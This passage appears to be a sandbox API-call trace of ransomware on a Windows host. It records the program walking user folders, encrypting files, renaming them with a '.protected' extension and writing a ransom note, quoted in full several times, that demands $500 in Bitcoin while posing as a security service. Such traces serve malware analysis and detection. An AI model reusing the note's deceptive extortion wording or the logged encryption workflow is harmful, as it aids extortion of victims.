(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.096] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.096] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.096] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.096] CloseHandle (hObject=0x154) returned 1 [0090.096] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Windows") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Program Files") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Program Files (x86)") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="$Recycle.bin") returned 1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="System Volume Information") returned -1 [0090.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned 99 [0090.096] lstrcmpW (lpString1="DZBKZBIC", lpString2=".") returned 1 [0090.096] lstrcmpW (lpString1="DZBKZBIC", lpString2="..") returned 1 [0090.096] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*") returned 101 [0090.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\.") returned 101 [0090.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.097] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.097] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.097] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\..") returned 102 [0090.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.097] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.097] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.097] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.097] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\RESTORE_FILES.txt") returned 117 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.098] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.098] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.098] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.098] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.099] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.099] CloseHandle (hObject=0x154) returned 1 [0090.099] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0090.099] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0090.099] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0090.099] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.099] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.099] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0090.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0090.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0090.099] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0090.099] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.111] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.111] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.111] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.111] CloseHandle (hObject=0x154) returned 1 [0090.111] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.protected") returned 110 [0090.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.protected")) returned 1 [0090.112] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Windows") returned -1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Program Files") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="Program Files (x86)") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="$Recycle.bin") returned 1 [0090.112] lstrcmpiW (lpString1="VRLZOZ0E", lpString2="System Volume Information") returned 1 [0090.113] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned 99 [0090.113] lstrcmpW (lpString1="VRLZOZ0E", lpString2=".") returned 1 [0090.113] lstrcmpW (lpString1="VRLZOZ0E", lpString2="..") returned 1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*") returned 101 [0090.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.113] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.113] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.113] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.113] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.113] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\.") returned 101 [0090.113] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.113] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.113] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.113] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.113] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.113] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.113] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\..") returned 102 [0090.113] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.113] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.114] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.114] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.114] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.114] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.114] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\RESTORE_FILES.txt") returned 117 [0090.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.115] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.115] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.115] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.115] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.116] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.116] CloseHandle (hObject=0x154) returned 1 [0090.116] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.116] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.116] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RESTORE_FILES.txt") returned 108 [0090.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your 